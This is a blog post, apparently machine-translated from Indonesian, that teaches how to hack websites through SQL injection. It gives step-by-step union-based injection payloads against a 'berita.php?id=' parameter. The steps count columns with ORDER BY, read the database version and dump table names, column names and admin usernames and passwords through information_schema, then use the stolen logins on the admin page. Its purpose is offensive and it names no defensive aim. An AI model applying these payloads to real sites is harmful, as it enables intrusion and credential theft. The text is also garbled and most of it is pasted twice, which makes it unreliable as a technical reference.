How to Hacking Website With SQL Injection TechniquesUnderstanding
SQL Injection, SQL Injection is an action applied client hacking is
done by modifying the SQL commands that exist in memory and the client
application is also a technique of exploiting web applications that use a
database for storing therein data.I need to know before doing SQL Injection in MySQL:character: 'or -comments: / * or -information_schema for version: MySQL version 5.x, no support for MySQL version 4.x[Step 1]
Look for a target
For example: [site] / berita.php? Id = 100
Add character 'at the end of the url or add character "-" to see if there is an error message.
example:
[Site] / berita.php? Id = 100 'or
[Site] / berita.php? Id = -100
So that the error message as follows [many more][Step 2]
Finding and counting the number of tables that exist in the database ...
use the command: order by
Example:
[Site] / berita.php? Id = -100 + order + by +1- - or
[Site] / berita.php? Id = -100 + order + by +1 / *
Please check it step by step (satupersatu) ...
For example:
[Site] / berita.php? Id = -100 + order + by +1- -
[Site] / berita.php? Id = -100 + order + by +2- -
[Site] / berita.php? Id = -100 + order + by +3- -
[Site] / berita.php? Id = -100 + order + by +4- -
So that there is an error or missing error message ...
For example: [site] / berita.php? Id = -100 + order + by +9- -
Means that we take is to figure 8
Being a [site] / berita.php? Id = -100 + order + by +8- -[Step 3]
how to remove the numbers that appear use the union
because it was error to figure 9
then: [site] / berita.php? id = -100 + union + select +1,2,3,4,5,6,7,8 -
ok is like that out number 5
use the version () or @ @ version to check which version of sql command input diapakai TSB on nagka who came out earlier
eg: [site] / berita.php? id = -100 + union + select +1,2,3,4, version () ,6,7,8 - or
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, @ @ version ,6,7,8 -
See the version used se'umpama version 4 left alone because in version 4 we have to guess at his own table and column that exist on the web because they can not use command + From INFORMATION_SCHEMA ..
For version 5 you are lucky, no need to guess table and column as version 4 as in version 5 can use command + From INFORMATION_SCHEMA ..[Step 4]
To display the table that is on the web is
table_name command >>> included in figures out last yangg
command + from + information_schema.tables / * >>> inserted after the last digit
Code:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, table_name, 6,7,8 + from + information_schema.tables--
Se'umpama table that appears is "admin"[Step 5]
to display all the contents of the table is
command group_concat (table_name) >>> included in the figures that came out earlier
command + from + information_schema.tables + where + table_schema = database () >>> inserted after the last digit
[Step 6]
Command group_concat (column_name) >>> included in the figures that came out earlier
information_schema.columns + orders + from + where + table_name = 0xhexa - >>> inserted after the last digit
At this stage you shall mengextrak word on the contents of a table that is by converting hexadecimal
Websites which are used for the conversion:
http://www.v3n0m.net/ascii.htm
Examples of words you want to convert the admin then it will be 61646D696E
[Step 7]
Bring up what had been excluded from the table that is the way
concat_ws command (0x3a, column contents result that would be issued) >>> included in the figures that came out earlier
command + from + (derived table name) >>> inserted after the last digit
Example:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, concat_ws (0x3a, result column contents), 6,7,8 + from + (name derived table) -
Example is the word that comes out id, username, password
Example:
[Step 8]
The last stage for admin or login page.
Ok thnks finish
Look for a target
For example: [site] / berita.php? Id = 100
Add character 'at the end of the url or add character "-" to see if there is an error message.
example:
[Site] / berita.php? Id = 100 'or
[Site] / berita.php? Id = -100
So that the error message as follows [many more][Step 2]
Finding and counting the number of tables that exist in the database ...
use the command: order by
Example:
[Site] / berita.php? Id = -100 + order + by +1- - or
[Site] / berita.php? Id = -100 + order + by +1 / *
Please check it step by step (satupersatu) ...
For example:
[Site] / berita.php? Id = -100 + order + by +1- -
[Site] / berita.php? Id = -100 + order + by +2- -
[Site] / berita.php? Id = -100 + order + by +3- -
[Site] / berita.php? Id = -100 + order + by +4- -
So that there is an error or missing error message ...
For example: [site] / berita.php? Id = -100 + order + by +9- -
Means that we take is to figure 8
Being a [site] / berita.php? Id = -100 + order + by +8- -[Step 3]
how to remove the numbers that appear use the union
because it was error to figure 9
then: [site] / berita.php? id = -100 + union + select +1,2,3,4,5,6,7,8 -
ok is like that out number 5
use the version () or @ @ version to check which version of sql command input diapakai TSB on nagka who came out earlier
eg: [site] / berita.php? id = -100 + union + select +1,2,3,4, version () ,6,7,8 - or
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, @ @ version ,6,7,8 -
See the version used se'umpama version 4 left alone because in version 4 we have to guess at his own table and column that exist on the web because they can not use command + From INFORMATION_SCHEMA ..
For version 5 you are lucky, no need to guess table and column as version 4 as in version 5 can use command + From INFORMATION_SCHEMA ..[Step 4]
To display the table that is on the web is
table_name command >>> included in figures out last yangg
command + from + information_schema.tables / * >>> inserted after the last digit
Code:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, table_name, 6,7,8 + from + information_schema.tables--
Se'umpama table that appears is "admin"[Step 5]
to display all the contents of the table is
command group_concat (table_name) >>> included in the figures that came out earlier
command + from + information_schema.tables + where + table_schema = database () >>> inserted after the last digit
[Step 6]
Command group_concat (column_name) >>> included in the figures that came out earlier
information_schema.columns + orders + from + where + table_name = 0xhexa - >>> inserted after the last digit
At this stage you shall mengextrak word on the contents of a table that is by converting hexadecimal
Websites which are used for the conversion:
http://www.v3n0m.net/ascii.htm
Examples of words you want to convert the admin then it will be 61646D696E
[Step 7]
Bring up what had been excluded from the table that is the way
concat_ws command (0x3a, column contents result that would be issued) >>> included in the figures that came out earlier
command + from + (derived table name) >>> inserted after the last digit
Example:
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, concat_ws (0x3a, result column contents), 6,7,8 + from + (name derived table) -
Example is the word that comes out id, username, password
Example:
[Step 8]
The last stage for admin or login page.
Ok thnks finish
Tidak ada komentar:
Posting Komentar
thank you for the criticism and advice